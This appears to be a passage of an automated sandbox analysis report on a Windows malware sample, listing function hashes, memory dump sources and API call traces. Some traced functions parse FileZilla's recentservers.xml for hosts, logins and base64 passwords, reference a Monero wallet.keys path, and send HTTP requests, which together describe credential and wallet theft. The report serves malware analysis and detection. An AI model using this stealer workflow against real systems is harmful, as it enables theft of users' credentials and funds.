                          • String ID:
                          • API String ID:
                          • Opcode ID: eeba4edd6d716afe910816fd908cb7cad329424f23b254baaf9f361c620f3d4e
                          • Instruction ID: a060c9f0efadbcd9eb4c26ce04c62906904cfdcf2fcb7acbfa5bccb31a651834
                          • Opcode Fuzzy Hash: eeba4edd6d716afe910816fd908cb7cad329424f23b254baaf9f361c620f3d4e
                          • Instruction Fuzzy Hash: 705156F3E181105BE708997CEC953B77799EB94320F1B463DEE99E7784E8399C048286
                          Function 01060CEB Relevance: .2, Instructions: 196COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1caa4f795ac6dde799315333ff7ef982fac2deb4983b73f2645169a9f9d28fe0
                          • Instruction ID: 36053e5433746a018aafd999401de2c03591cdff9cfe490c29867cc63b8d9c6e
                          • Opcode Fuzzy Hash: 1caa4f795ac6dde799315333ff7ef982fac2deb4983b73f2645169a9f9d28fe0
                          • Instruction Fuzzy Hash: 9E513AF3A182105FE7045A2DECD17BBB7D9EB98320F2A453DEA85D7380D93D5C004696
                          Function 0108BB50 Relevance: .2, Instructions: 174COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e108ed5cad3718f23da74c5ec57d56d206be8eceeef3311ae1ffe63550fbf8b6
                          • Instruction ID: 99c3bac69fc45e664a0bd77d5d504fb07353c7af107d4bf4f6669bc15a9e1280
                          • Opcode Fuzzy Hash: e108ed5cad3718f23da74c5ec57d56d206be8eceeef3311ae1ffe63550fbf8b6
                          • Instruction Fuzzy Hash: F25147F3A183185FE704BE3DDC857AABBD9EB94350F1A063DEAC083384E97554048692
                          Function 010D8367 Relevance: .2, Instructions: 160COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9126631bc8aa0710d869af34504d8296e4ad7cf3988633abe46731ecde8c19a3
                          • Instruction ID: 9a78d61a84f26528dcb94958f7a42e92c3851b1123c7b9e2c35bf1e2176479a4
                          • Opcode Fuzzy Hash: 9126631bc8aa0710d869af34504d8296e4ad7cf3988633abe46731ecde8c19a3
                          • Instruction Fuzzy Hash: 134117B3A082045FF304AE28DD9573BB7D6EB94320F1A853DDAC5D3784E93A68158296
                          Function 011115D4 Relevance: .1, Instructions: 103COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cb146d2175f3404f0d42e430a9b497bf52bb28c7a6d35048c45d18ff122c7b07
                          • Instruction ID: 173c11cfa0ba699b9ac9cdbc6bd682aea335d5a028471209c8daefa798399b94
                          • Opcode Fuzzy Hash: cb146d2175f3404f0d42e430a9b497bf52bb28c7a6d35048c45d18ff122c7b07
                          • Instruction Fuzzy Hash: 6331E2F3E181008BF304AA39DC967B776E7ABD0715F1B853DDA8987384ED7808468696
                          Function 00DF9750 Relevance: .0, Instructions: 15COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                          • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                          • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                          • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                          Function 00DF0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                            • Part of subcall function 00DF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00DF8E0B
                            • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                            • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                            • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                            • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,00838998,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                            • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                            • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                            • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                            • Part of subcall function 00DE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DE99EC
                            • Part of subcall function 00DE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00DE9A11
                            • Part of subcall function 00DE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00DE9A31
                            • Part of subcall function 00DE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00DE148F,00000000), ref: 00DE9A5A
                            • Part of subcall function 00DE99C0: LocalFree.KERNEL32(00DE148F), ref: 00DE9A90
                            • Part of subcall function 00DE99C0: CloseHandle.KERNEL32(000000FF), ref: 00DE9A9A
                            • Part of subcall function 00DF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00DF8E52
                          • GetProcessHeap.KERNEL32(00000000,000F423F,00E00DBA,00E00DB7,00E00DB6,00E00DB3), ref: 00DF0362
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00DF0369
                          • StrStrA.SHLWAPI(00000000,<Host>), ref: 00DF0385
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E00DB2), ref: 00DF0393
                          • StrStrA.SHLWAPI(00000000,<Port>), ref: 00DF03CF
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E00DB2), ref: 00DF03DD
                          • StrStrA.SHLWAPI(00000000,<User>), ref: 00DF0419
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E00DB2), ref: 00DF0427
                          • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00DF0463
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E00DB2), ref: 00DF0475
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E00DB2), ref: 00DF0502
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E00DB2), ref: 00DF051A
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E00DB2), ref: 00DF0532
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E00DB2), ref: 00DF054A
                          • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00DF0562
                          • lstrcat.KERNEL32(?,profile: null), ref: 00DF0571
                          • lstrcat.KERNEL32(?,url: ), ref: 00DF0580
                          • lstrcat.KERNEL32(?,00000000), ref: 00DF0593
                          • lstrcat.KERNEL32(?,00E01678), ref: 00DF05A2
                          • lstrcat.KERNEL32(?,00000000), ref: 00DF05B5
                          • lstrcat.KERNEL32(?,00E0167C), ref: 00DF05C4
                          • lstrcat.KERNEL32(?,login: ), ref: 00DF05D3
                          • lstrcat.KERNEL32(?,00000000), ref: 00DF05E6
                          • lstrcat.KERNEL32(?,00E01688), ref: 00DF05F5
                          • lstrcat.KERNEL32(?,password: ), ref: 00DF0604
                          • lstrcat.KERNEL32(?,00000000), ref: 00DF0617
                          • lstrcat.KERNEL32(?,00E01698), ref: 00DF0626
                          • lstrcat.KERNEL32(?,00E0169C), ref: 00DF0635
                          • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E00DB2), ref: 00DF068E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                          • API String ID: 1942843190-555421843
                          • Opcode ID: c3048a427bd3c1d2822412301d6a6d6f99e510523dc8a429b3820ca948fde0e7
                          • Instruction ID: b7bb603ef3a399463ac33120869e00bbdd1f0f4974fba9978a7e70eedd402dec
                          • Opcode Fuzzy Hash: c3048a427bd3c1d2822412301d6a6d6f99e510523dc8a429b3820ca948fde0e7
                          • Instruction Fuzzy Hash: B8D10BB5900208ABCB14EBE4DD96EFEB778EF14300F558418F606A7085DE75AA4ACB71
                          Function 00DE5960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                            • Part of subcall function 00DE47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00DE4839
                            • Part of subcall function 00DE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00DE4849
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00DE59F8
                          • StrCmpCA.SHLWAPI(?,00840B30), ref: 00DE5A13
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00DE5B93
                          • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00840BE0,00000000,?,0083FAE0,00000000,?,00E01A1C), ref: 00DE5E71
                          • lstrlen.KERNEL32(00000000), ref: 00DE5E82
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00DE5E93
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00DE5E9A
                          • lstrlen.KERNEL32(00000000), ref: 00DE5EAF
                          • lstrlen.KERNEL32(00000000), ref: 00DE5ED8
                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00DE5EF1
                          • lstrlen.KERNEL32(00000000,?,?), ref: 00DE5F1B
                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00DE5F2F
                          • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00DE5F4C
                          • InternetCloseHandle.WININET(00000000), ref: 00DE5FB0
                          • InternetCloseHandle.WININET(00000000), ref: 00DE5FBD
                          • HttpOpenRequestA.WININET(00000000,00840C10,?,00840030,00000000,00000000,00400100,00000000), ref: 00DE5BF8
                            • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,00838998,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                            • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                            • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                            • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                            • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                            • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                          • InternetCloseHandle.WININET(00000000), ref: 00DE5FC7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                          • String ID: "$"$------$------$------
                          • API String ID: 874700897-2180234286
                          • Opcode ID: 9cefeb6ad57131207380e2bdf477570a800d713f401f9c463224ccc711409869
                          • Instruction ID: 3682308ecdcbc4f76b2aa365f8a6cd826c0c79ab012a788683c108b3228f7c83
                          • Opcode Fuzzy Hash: 9cefeb6ad57131207380e2bdf477570a800d713f401f9c463224ccc711409869
                          • Instruction Fuzzy Hash: 2F121CB192012CAACB15EBA4DC95FEEB378FF14740F5181A9F20A66091DF702A49CF75
                          Function 00DECEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                            • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,00838998,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                            • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                            • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                            • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                            • Part of subcall function 00DF8B60: GetSystemTime.KERNEL32(00E00E1A,0083FC00,00E005AE,?,?,00DE13F9,?,0000001A,00E00E1A,00000000,?,00838998,?,\Monero\wallet.keys,00E00E17), ref: 00DF8B86
                            • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                            • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00DECF83
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00DED0C7
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00DED0CE
                          • lstrcat.KERNEL32(?,00000000), ref: 00DED208
                          • lstrcat.KERNEL32(?,00E01478), ref: 00DED217
                          • lstrcat.KERNEL32(?,00000000), ref: 00DED22A
                          • lstrcat.KERNEL32(?,00E0147C), ref: 00DED239
                          • lstrcat.KERNEL32(?,00000000), ref: 00DED24C
                          • lstrcat.KERNEL32(?,00E01480), ref: 00DED25B
                          • lstrcat.KERNEL32(?,00000000), ref: 00DED26E
                          • lstrcat.KERNEL32(?,00E01484), ref: 00DED27D
                          • lstrcat.KERNEL32(?,00000000), ref: 00DED290
                          • lstrcat.KERNEL32(?,00E01488), ref: 00DED29F
                          • lstrcat.KERNEL32(?,00000000), ref: 00DED2B2
                          • lstrcat.KERNEL32(?,00E0148C), ref: 00DED2C1
                          • lstrcat.KERNEL32(?,00000000), ref: 00DED2D4
                          • lstrcat.KERNEL32(?,00E01490), ref: 00DED2E3
                            • Part of subcall function 00DFA820: lstrlen.KERNEL32(00DE4F05,?,?,00DE4F05,00E00DDE), ref: 00DFA82B
                            • Part of subcall function 00DFA820: lstrcpy.KERNEL32(00E00DDE,00000000), ref: 00DFA885
                          • lstrlen.KERNEL32(?), ref: 00DED32A
                          • lstrlen.KERNEL32(?), ref: 00DED339
                            • Part of subcall function 00DFAA70: StrCmpCA.SHLWAPI(00838B28,00DEA7A7,?,00DEA7A7,00838B28), ref: 00DFAA8F
                          • DeleteFileA.KERNEL32(00000000), ref: 00DED3B4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                          • String ID:
                          • API String ID: 1956182324-0
                          • Opcode ID: ea9fb6e6690cd3a5d14591edfbc9ef6dbd8c8bdfab131ee2c7ddd94e195d1141
                          • Instruction ID: 5f7ec0825357541f0b8287e9b6aa911a529e14a9a8ef491ee9cf2ab3537a5723
                          • Opcode Fuzzy Hash: ea9fb6e6690cd3a5d14591edfbc9ef6dbd8c8bdfab131ee2c7ddd94e195d1141
                          • Instruction Fuzzy Hash: D1E13FB1910109ABCB24FBA4DD96EFE7378EF14300F118158F60AB7495DE75AA09CB72
                          Function 00DEC990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
